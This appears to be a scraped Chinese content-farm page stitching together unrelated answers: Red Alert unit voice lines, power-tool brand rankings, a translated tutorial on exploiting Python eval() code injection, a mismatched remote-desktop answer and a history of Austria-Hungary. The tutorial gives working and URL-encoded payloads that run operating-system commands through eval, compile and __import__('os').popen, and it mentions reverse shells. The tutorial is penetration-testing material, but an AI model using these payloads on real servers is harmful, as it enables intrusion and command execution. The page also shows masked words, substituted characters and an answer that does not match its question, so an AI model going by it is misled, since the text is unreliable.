内容导读:导航目录:1、红色警戒所有兵种说的话2、电动工具品牌排行是怎样的?3、如何使用python查找网站漏洞4、如何用Linux连接Windows的远程桌面5、一战时的奥匈现在是什么是国家??红色警戒所有兵种说的话...……
导航目录:
红色警戒所有兵种说的话
1. 剃刀巡洋舰:
The sea belongs to the empire.(海是属于天皇老子的)
2. 选取:They will submit or die.(他们要么投降,要么就死);Na gi na ta.(自报家门,剃刀);They won't stand against us.(他们不会对着我们干的。);All clear.(清光);where are they hiding?(他们躲拉块去了);Attention,all crew.(注意,全体船员们)
3. 移动:You heard the orders.(收到命令);They are here,I know it.(伊拉在这,啊拉晓得个);keep scaning.(继续搜寻);Proceed.(前进);New heading set.(设置新目的地);Carry on.(加油吧!剃刀们);Main engines.(主引擎,加快速度的意思吧,这不是很确定)
4. 攻击:Finally.(终于开打了);Rid them out.(把他们赶出去);They're right there.(他们在那边)
扩展资料:
1.将军战列舰:
出厂:The day of Shogun has arrived.(将军之日到来了)选取:Your intent is true.(明确您的意图);Oppuntities awaits.(等待机会);Be hold,the Shogun battle ship.(注意了,将军战列舰);The Empire battle ship.(自报家门,帝国战列舰);Operation is key.(作战是关键。)
2.移动:Proceed.(向前进,向前进,战士的责任重,妇女的冤仇深);As planned.(按照计划前进);We make our move.(怎么又是前进);A wise course.(一个明智的路线);Our course has been set.(我们的路线设置好了);It's our move.(还是前进)
电动工具品牌排行是怎样的?
电动工具品牌排行是博世电动工具、牧田电动工具、东成电动工具、史丹利电动工具、锐奇电动工具。
1、博世电动工具
博世电动工具(中国)有限公司,全球电动工具领先生产商,以维持高标准的产品品质、技术革新及售后服务而倍受欢迎,是目前国内销量名列靠前,网民认知度更低的一个品牌。
2、牧田电动工具
目前,是世界上更大的专[门制造专业电动工具的制造商之一,主营业务还包括电动工具 ,木杠机械,气动工具,家用及园艺用机器等的生产和卖出。
3、东成电动工具
江苏东成电动工具有限公司,创立于1995年,是国内专业电动工具生产重点骨干企业之- -,在国内电动工 具十大名牌中名列还是较前的。
4、史丹利电动工具
史丹利大大发售一流的五金和工具产品 ,其中许多产品都是五金的之一代产品。 成为全世界更大的工具产品的制造商, 旗下拥有多个一线工具品牌。
5、锐奇电动工具
上海锐奇工具股份有限公司,是中国电动工具行业中唯一同时拥有“中国名牌产品”、"国家免检产品”、 “中国杰出民营科技企业”三项国家级荣誉的高新技术企业。
如何使用python查找网站漏洞
如果你的Web应用中存在Python代码注入漏洞的话,攻击者就可以利用你的Web应用来向你后台服务器的Python解析器发送恶意Python代码了。这也就意味着,如果你可以在目标服务器中执行Python代码的话,你就可以通过调用服务器的操作系统的指令来实施攻击了。通过运行操作系统命令,你不仅可以对那些可以访问到的文件进行读写操作,甚至还可以启动一个远程的交互式Shell(例如nc、Metasploit和Empire)。
为了复现这个漏洞,我在最近的一次外部渗透测试过程中曾尝试去利用过这个漏洞。当时我想在网上查找一些关于这个漏洞具体应用 *** 的信息,但是并没有找到太多有价值的内容。在同事Charlie Worrell(@decidedlygray)的帮助下,我们成功地通过Burp POC实现了一个非交互式的shell,这也是我们这篇文章所要描述的内容。
因为除了Python之外,还有很多其他的语言(例如Perl和Ruby)也有可能出现代码注入问题,因此Python代码注入属于服务器端代码注入的一种。实际上,如果各位同学和我一样是一名CWE的关注者,那么下面这两个CWE也许可以给你提供一些有价值的参考内容:
1. CWE-94:代码生成控制不当(‘代码注入’)2. CWE-95:动态代码评估指令处理不当(‘Eval注入’)漏洞利用
假设你现在使用Burp或者其他工具发现了一个Python注入漏洞,而此时的漏洞利用Payload又如下所示:
eval(compile('for x in range(1):\n import time\n time.sleep(20)','a','single'))那么你就可以使用下面这个Payload来在目标主机中实现操作系统指令注入了:
eval(compile("""for x in range(1):\\n import os\\n os.popen(r'COMMAND').read()""",'','single'))实际上,你甚至都不需要使用for循环,直接使用全局函数“__import__”就可以了。具体代码如下所示:
eval(compile("""__import__('os').popen(r'COMMAND').read()""",'','single'))其实我们的Payload代码还可以更加简洁,既然我们已经将import和popen写在了一个表达式里面了,那么在大多数情况下,你甚至都不需要使用compile了。具体代码如下所示:
__import__('os').popen('COMMAND').read()
为了将这个Payload发送给目标Web应用,你需要对其中的某些字符进行URL编码。为了节省大家的时间,我们在这里已经将上面所列出的Payload代码编码完成了,具体如下所示:
param=eval%28compile%28%27for%20x%20in%20range%281%29%3A%0A%20import%20time%0A%20time.sleep%2820%29%27%2C%27a%27%2C%27single%27%29%29param=eval%28compile%28%22%22%22for%20x%20in%20range%281%29%3A%5Cn%20import%20os%5Cn%20os.popen%28r%27COMMAND%27%29.read%28%29%22%22%22%2C%27%27%2C%27single%27%29%29param=eval%28compile%28%22%22%22__import__%28%27os%27%29.popen%28r%27COMMAND%27%29.read%28%29%22%22%22%2C%27%27%2C%27single%27%29%29param=__import__%28%27os%27%29.popen%28%27COMMAND%27%29.read%28%29接下来,我们将会给大家介绍关于这个漏洞的细节内容,并跟大家分享一个包含这个漏洞的Web应用。在文章的结尾,我将会给大家演示一款工具,这款工具是我和我的同事Charlie共同编写的,它可以明显降低你在利用这个漏洞时所花的时间。简而言之,这款工具就像sqlmap一样,可以让你快速找到SQL注入漏洞,不过这款工具仍在起步阶段,感兴趣的同学可以在项目的GitHub主页[传送门]中与我交流一下。
搭建一个包含漏洞的服务器
为了更好地给各位同学进行演示,我专门创建了一个包含漏洞的Web应用。如果你想要自己动手尝试利用这个漏洞的话,你可以点击这里获取这份Web应用。接下来,我们要配置的就是Web应用的运行环境,即通过pip或者easy_install来安装web.py。它可以作为一 *** 立的服务器运行,或者你也可以将它加载至包含mod_wsgi模块的Apache服务器中。相关操作指令如下所示:
git clone VulnApp
./install_requirements.sh
python PyCodeInjectionApp.py
漏洞分析
当你在网上搜索关于python的eval()函数时,几乎没有文章会提醒你这个函数是非常不安全的,而eval()函数就是导致这个Python代码注入漏洞的罪魁祸首。如果你遇到了下面这两种情况,说明你的Web应用中存在这个漏洞:
1. Web应用接受用户输入(例如GET/POST参数,cookie值);2. Web应用使用了一种不安全的 *** 来将用户的输入数据传递给eval()函数(没有经过安全审查,或者缺少安全保护机制);下图所示的是一份包含漏洞的示例代码:
\
大家可以看到,eval()函数是上述代码中唯一一个存在问题的地方。除此之外,如果开发人员直接对用户的输入数据(序列化数据)进行拆封的话,那么Web应用中也将会出现这个漏洞。
不过需要注意的是,除了eval()函数之外,Python的exec()函数也有可能让你的Web应用中出现这个漏洞。而且据我所示,现在很多开发人员都会在Web应用中不规范地使用exec()函数,所以这个问题肯定会存在。
自动扫描漏洞
为了告诉大家如何利用漏洞来实施攻击,我通常会使用扫描器来发现一些我此前没有见过的东西。找到之后,我再想办法将毫无新意的PoC开发成一个有意义的exploit。不过我想提醒大家的是,不要过度依赖扫描工具,因为还很多东西是扫描工具也找不到的。
这个漏洞也不例外,如果你在某个Web应用中发现了这个漏洞,那么你肯定使用了某款自动化的扫描工具,比如说Burp Suite Pro。目前为止,如果不使用类似Burp Suite Pro这样的专业扫描工具,你几乎是无法发现这个漏洞的。
当你搭建好测试环境之后,启动并运行包含漏洞的示例应用。接下来,使用Burp Suite Pro来对其进行扫描。扫描结果如下图所示:
\
下图显示的是Burp在扫描这个漏洞时所使用的Payload:
\
我们可以看到,Burp之所以要将这个Web应用标记为“Vulnerable”(包含漏洞的),是因为当它将这个Payload发送给目标Web应用之后,服务器的Python解析器休眠了20秒,响应信息在20秒之后才成功返回。但我要提醒大家的是,这种基于时间的漏洞检查机制通常会存在一定的误报。
将PoC升级成漏洞利用代码
使用time.sleep()来验证漏洞的存在的确是一种很好的 *** 。接下来,为了执行操作系统指令并接收相应的输出数据,我们可以使用os.popen()、subprocess.Popen()、或者subprocess.check_output()这几个函数。当然了,应该还有很多其他的函数同样可以实现我们的目标。
因为eval()函数只能对表达式进行处理,因此Burp Suite Pro的Payload在这里使用了compile()函数,这是一种非常聪明的做法。当然了,我们也可以使用其他的 *** 来实现,例如使用全局函数“__import__”。关于这部分内容请查阅参考资料:[参考资料1][参考资料2]
下面这个Payload应该可以适用于绝大多数的场景:
?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
# Example with one expression
__import__('os').popen('COMMAND').read()
# Example with multiple expressions, separated by commasstr("-"*50),__import__('os').popen('COMMAND').read()如果你需要执行一个或多个语句,那么你就需要使用eval()或者compile()函数了。实现代码如下所示:
# Examples with one expression
eval(compile("""__import__('os').popen(r'COMMAND').read()""",'','single'))eval(compile("""__import__('subprocess').check_output(r'COMMAND',shell=True)""",'','single'))#Examples with multiple statements, separated by semicolonseval(compile("""__import__('os').popen(r'COMMAND').read();import time;time.sleep(2)""",'','single'))eval(compile("""__import__('subprocess').check_output(r'COMMAND',shell=True);import time;time.sleep(2)""",'','single'))在我的测试过程中,有时全局函数“__import__”会不起作用。在这种情况下,我们就要使用for循环了。相关代码如下所示:
eval(compile("""for x in range(1):\n import os\n os.popen(r'COMMAND').read()""",'','single'))eval(compile("""for x in range(1):\n import subprocess\n subprocess.Popen(r'COMMAND',shell=True, stdout=subprocess.PIPE).stdout.read()""",'','single'))eval(compile("""for x in range(1):\n import subprocess\n subprocess.check_output(r'COMMAND',shell=True)""",'','single'))如果包含漏洞的参数是一个GET参数,那么你就可以直接在浏览器中利用这个漏洞了:
\
请注意:虽然浏览器会帮你完成绝大部分的URL编码工作,但是你仍然需要对分号(%3b)和空格(%20)进行手动编码。除此之外,你也可以直接使用我们所开发的工具。
如果是POST参数的话,我建议各位直接使用类似Burp Repeater这样的工具。如下图所示,我在subprocess.check_output()函数中一次性调用了多个系统命令,即pwd、ls、-al、whoami和ping。
\
\
漏洞利用工具-PyCodeInjectionShell
你可以直接访问PyCodeInjectionShell的GitHub主页获取工具源码,我们也提供了相应的工具使用指南。在你使用这款工具的过程中会感觉到,它跟sqlmap一样使用起来非常的简单。除此之外,它的使用 *** 跟sqlmap基本相同。
如何用Linux连接Windows的远程桌面
windows下远程登陆linux服务器一般使用远程putty,secureCRT,xmanager等工具,使用SSH,serial,telnet等协议建立连接后可以打开字符窗口或者图像操作界面。
使用secureCRT进行远程登录的大致配置:
1、新建连接
配置连接参数
选择协议
完成
一战时的奥匈现在是什么是国家??
奥匈帝国
奥匈帝国(Austro-Hungarian Empire)(德语:Österreich-Ungarn,马扎尔语:Osztrák-Magyar Monarchia)是1867年至1918年间的一个中欧的二元君主国(Dual-Monarchic Union)国家。
在这段时间里,匈牙利王国与奥地利帝国组成联盟,这个联盟的德文全称是「帝国议会所代表的王国和领地以及匈牙利圣史蒂芬的王冠领地」(Die im Reichsrat vertretenen Königreiche und Länder und die Länder der heiligen ungarischen Stephanskrone)。在这情况下,匈牙利国王与奥地利国王均是同一个人。匈牙利对内享有一定程度地於立法、行政、司法、税收、海关等享有自治权;对外事务方面(外交和国防)则与奥地利一样,统一由帝国中央 *** 处理。
奥匈帝国是匈牙利贵族与奥地利的哈布斯堡王朝在争取维持原来的奥地利帝国时所达成的一个折衷解决 *** 。它的首府设在维也纳,是当时仅次於俄罗斯的欧洲第二大国,人口亦仅次於俄罗斯及德意志帝国,居於第三位。它是一个多民族国家,内政主要由组成它的十一个主要民族之间的商议所决定。当时欧洲各地民族独立思想不断发展。虽然奥匈帝国在其成立期间不断有民族起义和其它纠纷,但在它所存的约50年间整个国家的经济不断发展,国家得到现代化,许多开明的改革得以施行。之一次世界大战后奥匈帝国解体。
奥匈帝国的领土
一般将奥匈帝国的领土分为两个部分:内莱塔尼亚(Cislethania)和外莱塔尼亚(Translethania)。
狭义的内莱塔尼亚仅指莱塔河以西的部分,即奥地利,但广义的内莱塔尼亚还包括斯洛维尼亚、波希米亚、摩拉维亚、加里西亚和达尔马提亚等地区。这部分被统称为「帝国议会所代表的王国与领地」。
外莱塔尼亚,即莱塔河以东的部分,也不只包括匈牙利,而且还包括斯洛伐克、特兰西瓦尼亚、克罗埃西亚。这部分领土被统称为「圣史蒂芬的王冠领地」。圣史蒂芬一世是匈牙利的之一位基督教国王,他后来被尊为圣人。
行政划分
内莱塔尼亚的王国和领地包括
波希米亚王国 (Königreich Böhmen)
达尔马提亚王国 (Königreich Dalmatien)
加里西亚-洛多梅里亚王国 (Königreich Galizien und Lodomerien)
奥地利公国(包括上奥地利和下奥地利) (Erzherzogtumen Österreich Österreich ob der Enns und unter der Enns)
布科维纳公国 (Herzogtum Bukowina)
卡林西亚公国 (Herzogtum Kärnten)
卡尼鄂拉公国 (Herzogtum Krain)
萨尔茨堡公国 (Herzogtum Salzburg)
西里西亚公国 (Herzogtum Ober- und Niederschlesien)
施蒂利亚公国 (Herzogtum Steiermark)
摩拉维亚侯国 (Markgrafschaft Mähren)
蒂罗尔和前阿尔卑斯地区 (Gefürstete Grafschaft Tirol und Land Vorarlberg)
滨海省份 (Österreichisches Küstenland)
外莱塔尼亚包括:
匈牙利王国 (Königreich Ungarn)
克罗埃西亚-斯拉沃尼亚王国 (Königreich Kroatien und Slawonien)
阜姆(里耶卡)自由市 (Stadt Fiume)
波士尼亚和黑塞哥维纳 (Bosnien und Herzegowina)属於独立的帝国直辖省份,由匈牙利和奥地利共同管理。
奥匈帝国的建立:1867年的折衷方案
1867年2月建立奥匈帝国的折衷出於多种原因。在此之前,奥地利帝国是一个中央集权的统一帝国(1804年—1867年)。但19世纪中叶以后,这个帝国被削弱了许多:1859年的义大利独立战争使它在义大利的势力被削弱;1866年的普奥战争迫使它退出德意志邦联,同时匈牙利对维也纳的统治也非常不满。在帝国的其它许多地区民族主义思想也不断加犟。匈牙利对奥地利的统治不满出於多种原因,其中之一是奥地利在俄罗斯帝国的支持下对1848年匈牙利革命的镇压。
为了保障奥地利皇帝在匈牙利的地位,弗朗茨·约瑟夫皇帝与匈牙利的贵族举行谈判,寻求一个可以使他们支持他的折衷方案。一些 *** 官员劝告弗朗茨·约瑟夫与所有民族运动家谈判,来建立一个联邦国家。他们担心单独与匈牙利贵族谈判会遭到其它民族更大的反对。但弗朗茨·约瑟夫无法忽视匈牙利贵族的势力,而这些贵族只肯接受一个他们与奥地利传统贵族之间的二元体。当时,罗马尼亚和斯拉夫人等,亦曾要求参予政权,建立多元(七元) *** ,但基於奥地利和匈牙利贵族的反对,此方案被废除,而奥匈二元帝国则正式建立。
匈牙利贵族尤其要求皇帝特地在匈牙利加冕为匈牙利国王来证明匈牙利在帝国内的特权。他们还要求在布达佩斯设立一个有立法权的议会,这个议会设立的法律在历史上归属匈牙利王国的地区有效。这个议会的组成保证匈牙利人(尤其是其贵族和市民阶层的精华)在其中占多数,而国内众多的罗马尼亚和斯拉夫人少数民族则基本上无权。
*** 结构
奥匈帝国有三个不同的 *** :匈牙利 *** 、奥地利 *** 和一个位於皇帝之下的中央 *** 。匈牙利和奥地利各有各自的议会和自己的首相。皇帝的权利理论上是至高的,但实际上是有限的。皇帝的中央 *** 负责陆军、海军、外交和对外贸易。
奥匈帝国内的一些地区如贾利希亚和克罗埃西亚享受特别地位,它们拥有特殊的 *** 形式。
两个地区的共同 *** 由一个共同部长会议组成,这个共同部长会议的成员包括三个部长(财政、军事和外交),两个地区的首相,一些大公和皇帝本人。每个议会派出一个代表团分别对共同部长会议的财政计划进行表决,这样每个地区 *** 对共同 *** 的工作有一定的影响力。但最终共同 *** 的部长仅对皇帝负责,而皇帝本人有权对外交和军事政策作最后决定。
两个地方 *** 与中央 *** 权力交叉往往导致摩擦和低效率。尤其军队在这方面受到阻碍。尽管军事是中央 *** 的职权范围,但奥地利和匈牙利 *** 有「征兵、提供驻扎地、运输和补给,以及负责军队人员民事的和非军事事务的责任」。因此每个地方 *** 对中央 *** 的决定有很犟的影响力,而每个地方 *** 都使用每一个机会来扩大它们自己的权力。
两个地区之间奥地利部分占总人口的约57%以及主要经济资源。从1867年开始两个 *** 与中央 *** 之间更大的争执是关於每个 *** 向中央 *** 交纳多少费用的问题。这个问题每十年进行一次协商,而每次协商都造成很大的争议。尤其是从1900年代中开始(1906年4月)匈牙利的议会中民族主义者占多数和组织 *** 开始,这个争议问题造成了一个持久性的宪法危机。1907年10月和1917年11月,这个问题在一个「始终如旧」的基础上暂时获得解决。
民族关系
奥匈帝国民族组成
日耳曼人 24%
匈牙利人 20%
捷克人 13%
波兰人 10%
乌克兰人 8%
罗马尼亚人 6%
克罗埃西亚人 5%
斯洛伐克人 4%
塞尔维亚人 4%
斯洛维尼亚人 3%
义大利人 3%
在帝国的两个部分起支配作用的两个民族其实都是少数民族:在奥地利部分,日耳曼人人只占36%,而在匈牙利部分,匈牙利人也不到半数。
捷克人、波兰人、乌克兰人、斯洛维尼亚人和义大利人都试图在奥地利部分获得更大的发言权。
同时在匈牙利部分,罗马尼亚人、斯洛伐克人、克罗埃西亚人和塞尔维亚人也向匈牙利人的统治挑战。罗马尼亚人和塞尔维亚人还争取与新成立的罗马尼亚和塞尔维亚王国合并。
相对於在奥地利部分的德国统治者来说,匈牙利的统治者更不愿交出他们的权利。但1868年,在他们获得自 *** 一年后,他们授予克罗埃西亚王国部分自 *** 。
奥匈帝国内争议更大的一个问题是语言的问题。哪些语言是官方语言或官用语言总是一个问题。少数民族总是希望使用他们自己的语言以及教育他们自己的语言。比如1897年4月5日奥地利首相下令在波希米亚将捷克语和德语作为同等的内部官方语言,结果受到整个帝国德国民族主义者的抨击。最后这位首相被解雇。
经济
在其存在的51年间,奥匈帝国的经济发展很快。技术的改进促进了工业化和城市化。在这51年里,资本主义生产方式传播到整个帝国。旧的封建主义制度不断消失。维也纳附近、奥地利腹地、阿尔卑斯山麓和波希米亚是经济发展的中心。19世纪末,匈牙利中心平原和喀尔巴阡山脉地区的经济发展也很快。
整个帝国内的经济发展速度相差相当大。总的来说西部的发展比东部高得多。20世纪初整个帝国的经济发展速度都很高。从1870年到1913年,国家每人平均生产率每年约提高1.45%。与欧洲其它国家相比(英国1.00%,法国1.06%,德国1.51%),这个发展速度是比较高的。但国家的经济发展总的来说还是落后於其它国家,原因是它的起步比较晚。英国的数字约是奥匈帝国的三倍,德国是它的两倍。这个粗的比较还无法体现帝国内部发展的不均衡性。
铁路在奥匈帝国普及很快。1841年奥匈帝国的前身奥地利帝国就已经从维也纳出发在西部建立了一个铁路核心。此时 *** 认识到铁路的军事意义,因此开始在其建设上大量投资。布拉迪斯拉发、布达佩斯、布拉格、克拉科夫、格拉茨、卢布尔雅那和威尼斯都被联入铁路网。到1854年为止整个帝国内的铁路网长度达2000千米,其中约60-70%为国有。由於1848年的革命和克里米亚战争帝国 *** 为解决其经济困难开始将其铁路出售给私人投资者。
从1854年到1879年几乎所有的铁路建设都是由私人投资完成的。在奥地利部分铁路网延长了7952千米,在匈牙利部分铁路网延长了5839千米。许多新的地区被连入铁路网,现有的铁路网被连接到一起。在此之前奥匈帝国的主要运输工具是船运\,铁路网的发展使整个帝国的经济发展得以协调。
1879年后 *** 开始慢慢地重新将铁路网国有化。其主要原因是1870年代的经济萧条使私人企业对铁路的投资减缓了,无法满足 *** 的要求。从1879年到1900年奥匈帝国修建了25000千米铁路,大多数是补充已有的铁路网。在东部也建立了新的铁路。一些地区一直到此时才接通铁路。铁路网大大地降低了帝国内的运输费用,为其内部经济打开了新的市场。
外交
奥地利部分和匈牙利部分地区 *** 对中央 *** 的外交政策的态度也稍不相同。布达佩斯的政治家害怕帝国的扩大会使得匈牙利人的比例和影响变小。不过,帝国 *** 与德国在1879年结成德奥同盟,对付俄罗斯的同盟,则受到两个地区 *** 的欢迎,因为它们都将俄罗斯看作更大的军事威胁。
按1878年柏林条约奥匈帝国於1878年8月占领波士尼亚赫塞哥维纳。1908年10月它正式被并入帝国。这块地方被作为双方共同管理地区,并被率属於财政部管理。为解决这个不正常的状况一些维也纳的政治家考虑将这块地区与帝国南部的其它一些斯拉夫人占多数的地区合并为帝国的一个第三个地区。当地的克罗埃西亚人可能较为亲近维也纳,而非布达佩斯。
奥匈帝国的解体
在奥匈帝国领土上成立的新国家
1918年夏,战事对同盟国越来越不利。虽然到目前为止奥匈帝国内的少数民族领导人一直对哈布斯堡皇帝保持忠心,但此时他们不得不考虑他们自己的利益了。当协约国的胜利显而易见时,对他们来说也是脱离旧的帝国的时刻,接受协约国所宣扬的民族主义是必走的路了。此时的奥匈帝国已经无法将这众多民族联合在一起了。其它成员也对帝国丧失了信心:经济发展已经停止,新的经济发展的希望也消失了,战时许多战前在奥地利部分引入的开放政策被取消,这使社会主义者非常气愤。在这些条件下极端民族主义者获得了许多支持者。1918年9月和10月,一系列地区宣布独立。1918年11月3日奥匈帝国与协约国达成停火协议。
战争的结束也是奥匈帝国的终止。对战胜国来说,按照伍德鲁·威尔逊宣布的十四点计划奥匈帝国分裂为许多民族国家是必然的事。值得注意的是分裂奥匈帝国并非协约国的战争目的,这个建议一直到战争后期才获得支持。相反的,许多人认为奥匈帝国的分裂并不解决当地的民族问题,而只是使得这个地区更加不稳定。
10月28日捷克首先宣布独立,匈牙利其次。特兰西瓦尼亚大多数地区加入罗马尼亚,其中还包括了很多匈牙利少数民族。南部的斯拉夫地区联合组成了后来的南斯拉夫。
战后战胜国承认这些新的边界,大大地改变了当地的政治地图。一系列条约保障这些边界的合法性。
奥地利和匈牙利成为共和国,哈布斯堡王朝被永久驱逐。在匈牙利首先成立了一个匈牙利苏维埃共和国,但1919年罗马尼亚入侵后保皇势力又开始抬头。1920年匈牙利恢复为一个王国,但没有国王。奥匈帝国的最后一位皇帝卡尔一世企图占据这个王位没有成功(1921年3月至10月),他被放逐到葡萄牙属马德拉群岛,后来在那里逝世。米克罗斯·霍尔蒂成为执政者。
以下这些国家从奥匈帝国(有些是部分)产生:
奥地利
匈牙利
捷克斯洛伐克(现在分成捷克、斯洛伐克二国)
南斯拉夫(现在分成塞尔维亚、蒙特内哥罗、克罗埃西亚、波赫、斯洛维尼亚、马其顿等6国)
波兰
此外罗马尼亚和意大利也获得部分奥匈帝国的土地。